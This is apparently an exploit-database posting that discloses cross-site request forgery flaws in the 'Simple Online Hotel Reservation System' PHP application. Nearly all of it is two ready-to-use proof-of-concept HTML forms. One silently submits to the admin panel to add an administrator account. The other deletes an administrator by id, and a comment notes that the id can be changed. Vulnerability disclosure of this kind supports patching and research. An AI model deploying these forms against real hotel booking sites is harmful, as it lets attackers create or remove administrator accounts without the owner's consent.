Simple Online Hotel Reservation System Cross Site Request Forgery

Simple Online Hotel Reservation System suffers from multiple cross site request forgery vulnerabilities.


MD5 | 853c4a1becdebc1d661c91722c2f39a4

# Exploit Title: Simple Online Hotel Reservation System  - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 25, 2019
# Vendor Homepage: https://code-projects.org/
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
# Tested on: Kali linux, Windows 8.1

# PoC:

<html>
<head>
<title>Add Admin</title>
</head>
<body>
<form method = "POST" action="http://localhost/[PATH]/admin/add_account.php">
<label>Name </label>
<input type = "text" name = "name" /><br><br>
<label>Username </label>
<input type = "text" name = "username" /><br><br>
<label>Password </label>
<input type = "password" name = "password" /><br><br>
<button name = "add_account">Saved</button>
</div>
</form>
</body>
</html>





# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 25, 2019
# Vendor Homepage: https://code-projects.org/
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
# Tested on: Kali linux, Windows 8.1

# PoC:

<html>
<head>
<title>Delete Admin</title>
</head>
<body>
<form method = "POST" action="http://localhost/[PATH]/admin/delete_account.php?admin_id=1">
<!-- You can change admin_id -->
<button>Delete</button>
</form>
</body>
</html>



Related Posts